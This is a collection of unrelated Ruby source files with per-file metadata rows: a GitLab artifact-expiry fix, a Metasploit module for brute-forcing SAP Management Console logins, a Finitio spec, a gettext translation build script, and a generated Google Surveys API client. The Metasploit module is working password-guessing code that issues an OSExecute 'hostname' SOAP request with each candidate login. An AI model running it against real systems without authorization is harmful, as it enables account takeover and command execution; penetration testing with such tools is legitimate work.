  wrongly_expired_artifacts, @job_artifacts = @job_artifacts.partition { |artifact| wrongly_expired?(artifact) }

  remove_expire_at(wrongly_expired_artifacts)
end

# Feature-flag gate for the detection above.
def fix_expire_at?
  Feature.enabled?(:ci_detect_wrongly_expired_artifacts, default_enabled: :yaml)
end

# True when expire_at matches the suspicious date AND time signature.
def wrongly_expired?(artifact)
  return false unless artifact.expire_at.present?

  match_date?(artifact.expire_at) && match_time?(artifact.expire_at)
end

def match_date?(expire_at)
  [21, 22, 23].include?(expire_at.day)
end

def match_time?(expire_at)
  %w[00:00.000 30:00.000 45:00.000].include?(expire_at.strftime('%M:%S.%L'))
end

# Clears expire_at on the wrongly expired artifacts so they are kept.
def remove_expire_at(artifacts)
  Ci::JobArtifact.id_in(artifacts).update_all(expire_at: nil)
  Gitlab::AppLogger.info(message: "Fixed expire_at from artifacts.", fixed_artifacts_expire_at_count: artifacts.count)
end
end
end
end
Ci::JobArtifacts::DestroyBatchService.prepend_mod_with('Ci::JobArtifacts::DestroyBatchService')
| 38.788079 | 147 | 0.697115 |
114d6758d9125db7ac479fb03a5e48e821d1eb99 | 5,355 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
# Module metadata and options. Default RPORT 50013 is the standard SAP
# Management Console HTTP port.
def initialize
  super(
    'Name' => 'SAP Management Console Brute Force',
    'Description' => %q{
This module simply attempts to brute force the username and
password for the SAP Management Console SOAP Interface. If
the SAP_SID value is set it will replace instances of <SAPSID>
in any user/pass from any wordlist.
},
    'References' =>
      [
        # General
        [ 'URL', 'http://blog.c22.cc' ]
      ],
    'Author' => [ 'Chris John Riley' ],
    'License' => MSF_LICENSE
  )

  register_options(
    [
      Opt::RPORT(50013),
      OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
      OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
      OptPath.new('USER_FILE', [ false, "File containing users, one per line",
        File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
    ], self.class)

  register_autofilter_ports([ 50013 ])
end
# Scanner entry point per host: probes the Management Console endpoint,
# then iterates the configured user/pass combinations.
def run_host(rhost)
  uri = normalize_uri(target_uri.path)

  # Initial GET to verify the service is reachable before brute forcing.
  res = send_request_cgi({
    'uri' => uri,
    'method' => 'GET'
  })

  unless res # idiomatic replacement for `if not res`
    print_error("#{peer} [SAP] Unable to connect")
    return
  end

  print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']

  each_user_pass do |user, pass|
    enum_user(user, pass, uri)
  end
end
# Records a working credential (and its service/login linkage) in the
# Metasploit database. Expects :ip, :port, :service_name, :user, :password
# and :proof keys in +opts+.
def report_cred(opts)
  service_data = {
    address: opts[:ip],
    port: opts[:port],
    service_name: opts[:service_name],
    protocol: 'tcp',
    workspace_id: myworkspace_id
  }

  credential_data = {
    origin_type: :service,
    module_fullname: fullname,
    username: opts[:user],
    private_data: opts[:password],
    private_type: :password
  }.merge(service_data)

  login_data = {
    core: create_credential(credential_data),
    # Marked UNTRIED: the SOAP probe proves the password but not a full login audit.
    status: Metasploit::Model::Login::Status::UNTRIED,
    proof: opts[:proof]
  }.merge(service_data)

  create_credential_login(login_data)
end
# Tries one user/pass pair against the SOAP interface by issuing an
# OSExecute(hostname) request with HTTP Basic auth. A response without
# "Invalid Credentials" means the login worked; "Permission denied" vs an
# OSExecuteResponse body distinguishes whether OSExecute is authorized.
def enum_user(user, pass, uri)
  # Replace placeholder with SAP SID, if present
  if datastore['SAP_SID']
    user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
    pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
  end

  print_status("Trying username:'#{user}' password:'#{pass}'")
  success = false

  # Build the SOAP envelope for OSExecute(hostname).
  # NOTE(review): "xlmns:sapsess" below looks like a typo for "xmlns:" —
  # left as-is (runtime payload); confirm servers tolerate it.
  soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
  xsi = 'http://www.w3.org/2001/XMLSchema-instance'
  xs = 'http://www.w3.org/2001/XMLSchema'
  sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
  ns1 = 'ns1:OSExecute'

  data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
  data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"
  data << '<SOAP-ENV:Header>' + "\r\n"
  data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
  data << '<enableSession>true</enableSession>' + "\r\n"
  data << '</sapsess:Session>' + "\r\n"
  data << '</SOAP-ENV:Header>' + "\r\n"
  data << '<SOAP-ENV:Body>' + "\r\n"
  data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><command>hostname</command><async>0</async></' + ns1 + '>' + "\r\n"
  data << '</SOAP-ENV:Body>' + "\r\n"
  data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"

  user_pass = Rex::Text.encode_base64(user + ":" + pass)

  begin
    res = send_request_raw({
      'uri' => uri,
      'method' => 'POST',
      'data' => data,
      'headers' =>
        {
          # data is pure ASCII here, so length == bytesize.
          'Content-Length' => data.length,
          'SOAPAction' => '""',
          'Content-Type' => 'text/xml; charset=UTF-8',
          'Authorization' => 'Basic ' + user_pass
        }
    })

    return unless res
    # SAP answers 200 on success and 500 with a SOAP fault on auth errors.
    if (res.code != 500 and res.code != 200)
      return
    else
      body = res.body
      if body.match(/Invalid Credentials/i)
        success = false
      else
        success = true
        if body.match(/Permission denied/i)
          permission = false
        end
        if body.match(/OSExecuteResponse/i)
          permission = true
        end
      end
    end
  rescue ::Rex::ConnectionError
    print_error("#{peer} [SAP] Unable to connect")
    return
  end

  if success
    print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")

    if permission
      vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
    else
      vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
    end

    # NOTE(review): `port` — confirm the mixin exposes this helper here
    # (rport is the usual accessor for the target port).
    report_cred(
      ip: rhost,
      port: port,
      user: user,
      password: pass,
      service_name: 'sap-managementconsole',
      proof: res.body
    )
  else
    vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
  end
end
end
| 29.262295 | 122 | 0.571055 |
0361a037dd0356bdd3c72de2b7a8ba3aaf9b7b2e | 561 | require 'spec_helper'
module Finitio
  # Construction behavior of SetType: accepts a Finitio::Type element type,
  # rejects anything else with an ArgumentError.
  describe SetType, 'initialize' do
    subject { described_class.new(intType) }

    context 'with valid arguments' do
      it { is_expected.to be_a(SetType) }

      it 'should set the instance variables' do
        expect(subject.elm_type).to eq(intType)
      end
    end

    context 'with invalid arguments' do
      subject { described_class.new("foo") }

      it 'should raise an error' do
        expect { subject }.to raise_error(ArgumentError, 'Finitio::Type expected, got `foo`')
      end
    end
  end
end
| 19.344828 | 76 | 0.616756 |
91ed2d1b733d19e45891049b012d1e9a63d7a561 | 4,351 | #!/usr/bin/ruby
# Copyright (c) 2015-2016 SUSE LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
require 'rubygems'
require 'nokogiri'
require 'json'
require 'gettext'
require 'tmpdir'
require 'fileutils'
include GetText
# PO-file header template; POT-Creation-Date is refreshed on every run so
# msgcat always receives a syntactically complete header.
pot = <<-END
msgid ""
msgstr ""
"Project-Id-Version: PACKAGE VERSION\\n"
"Report-Msgid-Bugs-To: \\n"
"POT-Creation-Date: #{Time.now}\\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\\n"
"Language-Team: LANGUAGE <[email protected]>\\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
END

cfg = JSON.parse(File.read('po/config.json'))
package_name = cfg['name']
pot_file = "po/#{package_name}.pot"
pot_file_stamp = File.stat(pot_file).mtime
newest_stamp = pot_file_stamp

strings = Hash.new       # translatable msgid => list of source line numbers
listed_langs = Hash.new  # language code => display text found in the page

cfg['pages'].each do |page_path|
  # Block form closes the file handle (the old bare `open` leaked it) and
  # tracks the newest page mtime so the .pot is only regenerated when needed.
  page = File.open(page_path, 'r') do |f|
    mtime = f.stat.mtime
    newest_stamp = mtime if mtime > newest_stamp
    Nokogiri::HTML(f)
  end
  page.xpath('//*[@lang="en"]').each do |t|
    next if t.name == 'html'
    text = t.text
    if text.empty?
      # Elements without text content may still carry translatable attributes.
      text = t.attribute('placeholder').to_s
      text = t.attribute('value').to_s if text.empty?
      next if text.empty?
    end
    strings[text] ||= []
    strings[text].push(t.line)
    # Anchor targets are extracted too (e.g. localized documentation links).
    if t.name == 'a' && !t.attribute('href').to_s.empty?
      href = t.attribute('href').to_s
      strings[href] ||= []
      strings[href].push(t.line)
    end
  end
  page.xpath('//*[@class="change-language"]').each do |t|
    lang = t.attribute('data-language-value').value
    listed_langs[lang] = t.text
  end
end

if pot_file_stamp < newest_stamp
  puts("updating #{pot_file}")
  strings.each_pair do |text, lines|
    # String#<< mutates in place instead of reallocating on every +=.
    pot << "#: "
    pot << lines.map { |l| "index.html:#{l}" }.join(' ')
    pot << "\n"
    pot << "msgid \"#{text}\"\n"
    pot << "msgstr \"\"\n"
    pot << "\n"
  end
  # Block form of IO.popen closes the pipe and waits for msgcat to exit;
  # the previous `f = IO.popen(...).puts(pot)` never closed the pipe, so
  # msgcat could still be writing when the file was stat'ed below.
  IO.popen("msgcat -F - -o #{pot_file}", "w") { |io| io.puts(pot) }
  pot_file_stamp = File.stat(pot_file).mtime
end

Dir.mktmpdir do |localedir|
  Dir.glob("po/*.po").sort.each do |po|
    language = %r{po/([^.]+).po}.match(po)[1]
    target_file = "assets/js/langpack/#{language}.json"
    system("msgmerge -q -U #{po} #{pot_file}")
    # Skip languages whose generated langpack is already newer than the .po.
    # File.exist? replaces File.exists?, which was removed in Ruby 3.2.
    if File.exist?(target_file) && File.stat(po).mtime < File.stat(target_file).mtime
      next
    end
    domain = "#{language}_landing"
    mofile = "#{localedir}/#{language}/LC_MESSAGES/#{domain}.mo"
    GetText.locale = language
    FileUtils.mkpath("#{localedir}/#{language}/LC_MESSAGES")
    system("msgfmt -o #{mofile} #{po}")
    GetText.bindtextdomain(domain, path: localedir)
    GetText.textdomain(domain)
    translations = {}
    strings.keys.sort.each do |string|
      next if string.empty?
      translation = gettext(string)
      # Only keep strings that actually differ from the English source
      # (reuses the lookup above instead of calling gettext twice).
      translations[string] = translation if string != translation
    end
    if translations.count < 5
      puts("#{language} has only #{translations.count} translations, skipping")
      next
    end
    unless listed_langs.key?(language)
      puts("missing #{language} in index.html, don't forget assets/js/opensuse-theme.js")
    end
    puts("updating #{target_file} ...")
    hash = {}
    hash['WARNING'] = 'Please see the README.md - this is generated'
    hash['token'] = translations
    open(target_file, "w") do |f|
      f.write(JSON.pretty_generate(hash))
    end
  end
end
| 31.759124 | 89 | 0.67134 |
d5aecd6f7baba8ae3b1fe4ffe0131dd90d69da8f | 6,701 | =begin
#ORY Oathkeeper
#ORY Oathkeeper is a reverse proxy that checks the HTTP Authorization for validity against a set of rules. This service uses Hydra to validate access tokens and policies.
The version of the OpenAPI document: v0.0.0-alpha.62
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.2.1
=end
require 'date'
require 'time'
module OryOathkeeperClient
# The standard error format
class IsInstanceAliveInternalServerError
attr_accessor :payload
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'payload' => :'Payload'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'payload' => :'IsInstanceAliveInternalServerErrorBody'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `OryOathkeeperClient::IsInstanceAliveInternalServerError` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `OryOathkeeperClient::IsInstanceAliveInternalServerError`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'payload')
self.payload = attributes[:'payload']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
payload == o.payload
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[payload].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = OryOathkeeperClient.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 30.459091 | 233 | 0.635129 |
f81ab106cd5844dc4e21f09fb92e76342e8e26a6 | 3,158 | class Bullet < Formula
desc "Physics SDK"
homepage "https://bulletphysics.org/"
url "https://github.com/bulletphysics/bullet3/archive/3.17.tar.gz"
sha256 "baa642c906576d4d98d041d0acb80d85dd6eff6e3c16a009b1abf1ccd2bc0a61"
license "Zlib"
head "https://github.com/bulletphysics/bullet3.git", branch: "master"
bottle do
rebuild 1
sha256 cellar: :any, arm64_monterey: "9ebae8edbbf4df12b7190daa7ef11f32651a478dd5ac3e07c81c2d4378bdf554"
sha256 cellar: :any, arm64_big_sur: "1f2000191b311d231c5e1a949aba892992e533df61cb3cf05cd1ec7ded01cb3f"
sha256 cellar: :any, monterey: "2ccc0eff9a5116600282123ebaa2d3adaed572103a4c372467577b4aa5e02671"
sha256 cellar: :any, big_sur: "85bf74ad7500b0bc9b15f212cc45d1d3ad6e2a2e427a1878ac571e7fd7007d97"
sha256 cellar: :any, catalina: "76e1c4ed888700e335545275f080f954071d76164784881488b0b31f295bdbb3"
sha256 cellar: :any, mojave: "3b39c389a9b532dfdbc0f3652bf9530fc68e1d453d1df5e017028b41f448e6c6"
sha256 cellar: :any_skip_relocation, x86_64_linux: "c2887fa28d8a3e81b07eff60948ee01179438333e826e1692799d6253e3fcc27"
end
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]" => :build
def install
common_args = %w[
-DBT_USE_EGL=ON
-DBUILD_UNIT_TESTS=OFF
-DINSTALL_EXTRA_LIBS=ON
]
double_args = std_cmake_args + %W[
-DCMAKE_INSTALL_RPATH=#{opt_lib}/bullet/double
-DUSE_DOUBLE_PRECISION=ON
-DBUILD_SHARED_LIBS=ON
]
mkdir "builddbl" do
system "cmake", "..", *double_args, *common_args
system "make", "install"
end
dbllibs = lib.children
(lib/"bullet/double").install dbllibs
args = std_cmake_args + %W[
-DBUILD_PYBULLET_NUMPY=ON
-DCMAKE_INSTALL_RPATH=#{opt_lib}
]
mkdir "build" do
system "cmake", "..", *args, *common_args, "-DBUILD_SHARED_LIBS=OFF", "-DBUILD_PYBULLET=OFF"
system "make", "install"
system "make", "clean"
system "cmake", "..", *args, *common_args, "-DBUILD_SHARED_LIBS=ON", "-DBUILD_PYBULLET=ON"
system "make", "install"
end
# Install single-precision library symlinks into `lib/"bullet/single"` for consistency
lib.each_child do |f|
next if f == lib/"bullet"
(lib/"bullet/single").install_symlink f
end
end
test do
(testpath/"test.cpp").write <<~EOS
#include "LinearMath/btPolarDecomposition.h"
int main() {
btMatrix3x3 I = btMatrix3x3::getIdentity();
btMatrix3x3 u, h;
polarDecompose(I, u, h);
return 0;
}
EOS
cxx_lib = "-lc++"
on_linux do
cxx_lib = "-lstdc++"
end
# Test single-precision library
system ENV.cc, "test.cpp", "-I#{include}/bullet", "-L#{lib}",
"-lLinearMath", cxx_lib, "-o", "test"
system "./test"
# Test double-precision library
system ENV.cc, "test.cpp", "-I#{include}/bullet", "-L#{lib}/bullet/double",
"-lLinearMath", cxx_lib, "-o", "test"
system "./test"
end
end
| 33.595745 | 123 | 0.651995 |
e2b75503ac2882db1449d0b9f096da58b8b550f4 | 208 | # frozen_string_literal: true
# Authorization rules for URL resources (ApplicationPolicy subclass;
# `user` is provided by the parent policy).
class UrlPolicy < ApplicationPolicy
  # Listing is open to everyone.
  def index?
    true
  end

  # Editing requires associate-level access on the current user.
  def edit?
    user.associate_access?
  end

  # Updating and destroying follow the same rule as editing; define_method
  # preserves the dynamic dispatch of the original delegating methods.
  %i[update? destroy?].each do |action|
    define_method(action) { edit? }
  end
end
| 10.4 | 35 | 0.658654 |
f8dff1d544c45baa3d1839871302a136b5f41fed | 925 | require_relative 'spec_helper'
describe 'Mongoid::EncryptedString integration' do
  # Plaintext value used across all examples.
  let(:string) { 'foo' }

  describe 'create document without any attributes' do
    subject { Document.create }

    # No default configured on Document: the encrypted field stays nil.
    it 'sets encrypted string to nil' do
      subject.string.must_be_nil
    end

    # NOTE(review): the stray "}" at the end of this description looks like
    # a typo in the example name (it is only a label, not code).
    describe "when default is set to 'foo' }" do
      subject { DocumentWithImplicitDefault.create }

      it 'sets encrypted string to foo' do
        subject.string.must_equal string
      end
    end

    describe "when default is set to ->{ EncryptedString.new('foo') }" do
      subject { DocumentWithExplicitDefault.create }

      it 'sets encrypted string to foo' do
        subject.string.must_equal string
      end
    end
  end

  describe 'create document with attribute' do
    subject { Document.create(string: string) }

    it 'sets encrypted string to foo' do
      subject.string.must_equal string
    end
  end
end
| 20.108696 | 73 | 0.677838 |
7ad15675f7f576f102d6e982f55ec87b5bcabf5b | 409 | module Far
class Options < Hash
attr_accessor :options
def self.far_options
[:replace, :no_replace, :please, :no_please]
end
def initialize(options={})
options.each do |k, v|
self[k.to_sym] = Option.new k, v
end
end
def to_command_line
self.reject do |k, v|
v.far_option?
end.values.map(&:to_command_line).join(" ")
end
end
end
| 18.590909 | 50 | 0.596577 |
03286764a59a475f459ee3a907725fff9aa83b37 | 27,107 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module SurveysV2
#
class FieldMask
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `fields`
# @return [Array<Google::Apis::SurveysV2::FieldMask>]
attr_accessor :fields
#
# Corresponds to the JSON property `id`
# @return [Fixnum]
attr_accessor :id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@fields = args[:fields] if args.key?(:fields)
@id = args[:id] if args.key?(:id)
end
end
#
class PageInfo
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `resultPerPage`
# @return [Fixnum]
attr_accessor :result_per_page
#
# Corresponds to the JSON property `startIndex`
# @return [Fixnum]
attr_accessor :start_index
#
# Corresponds to the JSON property `totalResults`
# @return [Fixnum]
attr_accessor :total_results
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@result_per_page = args[:result_per_page] if args.key?(:result_per_page)
@start_index = args[:start_index] if args.key?(:start_index)
@total_results = args[:total_results] if args.key?(:total_results)
end
end
#
class ResultsGetRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `resultMask`
# @return [Google::Apis::SurveysV2::ResultsMask]
attr_accessor :result_mask
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@result_mask = args[:result_mask] if args.key?(:result_mask)
end
end
#
class ResultsMask
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `fields`
# @return [Array<Google::Apis::SurveysV2::FieldMask>]
attr_accessor :fields
#
# Corresponds to the JSON property `projection`
# @return [String]
attr_accessor :projection
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@fields = args[:fields] if args.key?(:fields)
@projection = args[:projection] if args.key?(:projection)
end
end
# Representation of an individual survey object.
class Survey
include Google::Apis::Core::Hashable
# Specifications for the target audience of a survey run through the API.
# Corresponds to the JSON property `audience`
# @return [Google::Apis::SurveysV2::SurveyAudience]
attr_accessor :audience
# Message defining the cost to run a given survey through API.
# Corresponds to the JSON property `cost`
# @return [Google::Apis::SurveysV2::SurveyCost]
attr_accessor :cost
# Additional information to store on behalf of the API consumer and associate
# with this question. This binary blob is treated as opaque. This field is
# limited to 64K bytes.
# Corresponds to the JSON property `customerData`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :customer_data
# Text description of the survey.
# Corresponds to the JSON property `description`
# @return [String]
attr_accessor :description
# List of email addresses for survey owners. Must contain at least the address
# of the user making the API call.
# Corresponds to the JSON property `owners`
# @return [Array<String>]
attr_accessor :owners
# List of questions defining the survey.
# Corresponds to the JSON property `questions`
# @return [Array<Google::Apis::SurveysV2::SurveyQuestion>]
attr_accessor :questions
# Message representing why the survey was rejected from review, if it was.
# Corresponds to the JSON property `rejectionReason`
# @return [Google::Apis::SurveysV2::SurveyRejection]
attr_accessor :rejection_reason
# State that the survey is in.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Unique survey ID, that is viewable in the URL of the Survey Creator UI
# Corresponds to the JSON property `surveyUrlId`
# @return [String]
attr_accessor :survey_url_id
# Optional name that will be given to the survey.
# Corresponds to the JSON property `title`
# @return [String]
attr_accessor :title
# Number of responses desired for the survey.
# Corresponds to the JSON property `wantedResponseCount`
# @return [Fixnum]
attr_accessor :wanted_response_count
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@audience = args[:audience] if args.key?(:audience)
@cost = args[:cost] if args.key?(:cost)
@customer_data = args[:customer_data] if args.key?(:customer_data)
@description = args[:description] if args.key?(:description)
@owners = args[:owners] if args.key?(:owners)
@questions = args[:questions] if args.key?(:questions)
@rejection_reason = args[:rejection_reason] if args.key?(:rejection_reason)
@state = args[:state] if args.key?(:state)
@survey_url_id = args[:survey_url_id] if args.key?(:survey_url_id)
@title = args[:title] if args.key?(:title)
@wanted_response_count = args[:wanted_response_count] if args.key?(:wanted_response_count)
end
end
# Specifications for the target audience of a survey run through the API.
class SurveyAudience
include Google::Apis::Core::Hashable
# Optional list of age buckets to target. Supported age buckets are: ['18-24', '
# 25-34', '35-44', '45-54', '55-64', '65+']
# Corresponds to the JSON property `ages`
# @return [Array<String>]
attr_accessor :ages
# Required country code that surveys should be targeted to. Accepts standard ISO
# 3166-1 2 character language codes. For instance, 'US' for the United States,
# and 'GB' for the United Kingdom.
# Corresponds to the JSON property `country`
# @return [String]
attr_accessor :country
# Country subdivision (states/provinces/etc) that surveys should be targeted to.
# For all countries except GB, ISO-3166-2 subdivision code is required (eg. 'US-
# OH' for Ohio, United States). For GB, NUTS 1 statistical region codes for the
# United Kingdom is required (eg. 'UK-UKC' for North East England).
# Corresponds to the JSON property `countrySubdivision`
# @return [String]
attr_accessor :country_subdivision
# Optional gender to target.
# Corresponds to the JSON property `gender`
# @return [String]
attr_accessor :gender
# Language code that surveys should be targeted to. For instance, 'en-US'.
# Surveys may target bilingual users by specifying a list of language codes (for
# example, 'de' and 'en-US'). In that case, all languages will be used for
# targeting users but the survey content (which is displayed) must match the
# first language listed. Accepts standard BCP47 language codes. See
# specification.
# Corresponds to the JSON property `languages`
# @return [Array<String>]
attr_accessor :languages
# Online population source where the respondents are sampled from.
# Corresponds to the JSON property `populationSource`
# @return [String]
attr_accessor :population_source
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@ages = args[:ages] if args.key?(:ages)
@country = args[:country] if args.key?(:country)
@country_subdivision = args[:country_subdivision] if args.key?(:country_subdivision)
@gender = args[:gender] if args.key?(:gender)
@languages = args[:languages] if args.key?(:languages)
@population_source = args[:population_source] if args.key?(:population_source)
end
end
# Message defining the cost to run a given survey through API.
class SurveyCost
include Google::Apis::Core::Hashable
# Cost per survey response in nano units of the given currency. To get the total
# cost for a survey, multiply this value by wanted_response_count.
# Corresponds to the JSON property `costPerResponseNanos`
# @return [Fixnum]
attr_accessor :cost_per_response_nanos
# Currency code that the cost is given in.
# Corresponds to the JSON property `currencyCode`
# @return [String]
attr_accessor :currency_code
# *Deprecated* Threshold to start a survey automatically if the quoted price is
# at most this value. When a survey has a Screener (threshold) question, it must
# go through an incidence pricing test to determine the final cost per response.
# Typically you will have to make a followup call to start the survey giving the
# final computed cost per response. If the survey has no threshold_answers,
# setting this property will return an error. By specifying this property, you
# indicate the max price per response you are willing to pay in advance of the
# incidence test. If the price turns out to be lower than the specified value,
# the survey will begin immediately and you will be charged at the rate
# determined by the incidence pricing test. If the price turns out to be greater
# than the specified value the survey will not be started and you will instead
# be notified what price was determined by the incidence test. At that point,
# you must raise the value of this property to be greater than or equal to that
# cost before attempting to start the survey again. This will immediately start
# the survey as long the incidence test was run within the last 21 days. This
# will no longer be available after June 2018.
# Corresponds to the JSON property `maxCostPerResponseNanos`
# @return [Fixnum]
attr_accessor :max_cost_per_response_nanos
# Cost of survey in nano units of the given currency. DEPRECATED in favor of
# cost_per_response_nanos
# Corresponds to the JSON property `nanos`
# @return [Fixnum]
attr_accessor :nanos
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@cost_per_response_nanos = args[:cost_per_response_nanos] if args.key?(:cost_per_response_nanos)
@currency_code = args[:currency_code] if args.key?(:currency_code)
